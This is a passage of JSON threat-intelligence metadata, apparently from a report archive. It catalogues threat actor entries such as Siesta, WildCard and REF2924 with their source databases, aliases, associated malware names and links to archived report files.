"Gen:Trojan.Heur.PT", "Poison Ivy", "SPIVY", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null }, { "id": "f9bb42e1-65d6-444e-8c63-21c2605b49e0", "created_at": "2023-01-06T13:46:38.887429Z", "updated_at": "2026-04-10T02:00:03.133382Z", "deleted_at": null, "main_name": "Siesta", "aliases": [], "source_name": "MISPGALAXY:Siesta", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "2864e40a-f233-4618-ac61-b03760a41cbb", "created_at": "2023-12-01T02:02:34.272108Z", "updated_at": "2026-04-10T02:00:04.97558Z", "deleted_at": null, "main_name": "WildCard", "aliases": [], "source_name": "ETDA:WildCard", "tools": [ "RustDown", "SysJoker" ], "source_id": "ETDA", "reports": null }, { "id": "dbee5a02-e2d6-49d2-9bb5-5a9e93fd1de9", "created_at": "2023-11-07T02:00:07.108976Z", "updated_at": "2026-04-10T02:00:03.411448Z", "deleted_at": null, "main_name": "REF2924", "aliases": [], "source_name": "MISPGALAXY:REF2924", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "256a6a2d-e8a2-4497-b399-628a7fad4b3e", "created_at": "2023-11-30T02:00:07.299845Z", "updated_at": "2026-04-10T02:00:03.484788Z", "deleted_at": null, "main_name": "WildCard", "aliases": [], "source_name": "MISPGALAXY:WildCard", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434111, "ts_updated_at": 1775826722, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/667339bc841ad89e550b874079da69e6d7493083.pdf", "text": "https://archive.orkl.eu/667339bc841ad89e550b874079da69e6d7493083.txt", "img": "https://archive.orkl.eu/667339bc841ad89e550b874079da69e6d7493083.jpg" } }